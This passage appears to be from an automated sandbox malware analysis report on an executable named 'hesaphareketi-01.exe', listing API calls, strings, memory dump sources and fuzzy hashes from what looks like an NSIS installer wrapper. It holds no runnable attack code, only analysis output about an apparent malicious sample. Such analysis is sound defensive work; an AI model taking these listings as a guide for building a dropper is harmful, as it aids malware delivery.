                                                                                        • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                        • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                      • API String ID: 2171350718-461813615
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CoTaskMemFree.OLE32 ref: 0040481B
                                                                                        • Part of subcall function 00405B53: lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                                        • Part of subcall function 00405B53: CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                                        • Part of subcall function 00405B53: lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                                      • lstrcmpiW.KERNEL32(Call,?,00000000,?), ref: 0040484D
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                                                      • SetDlgItemTextW.USER32(?,000003FB), ref: 0040486B
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
                                                                                      • String ID: ,Dw$C:\Users\user\AppData\Local\Temp\Undige$Call
                                                                                      • API String ID: 611778071-2967598475
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hesaphareketi-01.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hesaphareketi-01.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hesaphareketi-01.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-3968801132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                                                      • GetSysColor.USER32(00000000), ref: 004042B7
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                                                      • SetBkMode.GDI32(?,?), ref: 004042CF
                                                                                      • GetSysColor.USER32(?), ref: 004042E2
                                                                                      • SetBkColor.GDI32(?,?), ref: 004042F2
                                                                                      • DeleteObject.GDI32(?), ref: 0040430C
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                      • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                      • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                        • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                      • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                                                      • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                      • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                                                      • GetMessagePos.USER32 ref: 00404BD3
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404BED
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                                      • MulDiv.KERNEL32(00059E97,00000064,0005A09B), ref: 00402E20
                                                                                      • wsprintfW.USER32 ref: 00402E30
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402E2A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                      • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                                                      • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                      • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                      • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                      • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                      • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj313A.tmp$C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll
                                                                                      • API String ID: 3109718747-3191707098
                                                                                      • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                      • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                                                      • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                      • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                      • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                      • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                      • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                                                      • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                                                      • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                                                      • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(0042D248,0042D248,0000040F,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400), ref: 00404B43
                                                                                      • wsprintfW.USER32 ref: 00404B4C
                                                                                      • SetDlgItemTextW.USER32(00000000,0042D248), ref: 00404B5F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      • Opcode ID: 5f447e8c3e0c0d793aaaef53ecb87e13e88cece0c879eaec7e6436626da57f90
                                                                                      • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                                                      • Opcode Fuzzy Hash: 5f447e8c3e0c0d793aaaef53ecb87e13e88cece0c879eaec7e6436626da57f90
                                                                                      • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405C0C
                                                                                      • CharNextW.USER32(00000000), ref: 00405C11
                                                                                      • CharNextW.USER32(00000000), ref: 00405C29
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3213498283-3404278061
                                                                                      • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                      • Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
                                                                                      • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                                      • Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-787714339
                                                                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                      • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                      • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                                                      • GetTickCount.KERNEL32 ref: 00402E8E
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                                      • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                                                      • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                                      • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00405289
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                                        • Part of subcall function 00404263: SendMessageW.USER32(0001046E,00000000,00000000,00000000), ref: 00404275
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
